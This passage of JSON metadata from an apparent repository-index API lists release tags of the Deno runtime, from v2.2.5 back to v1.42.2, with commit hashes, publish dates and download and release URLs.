","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T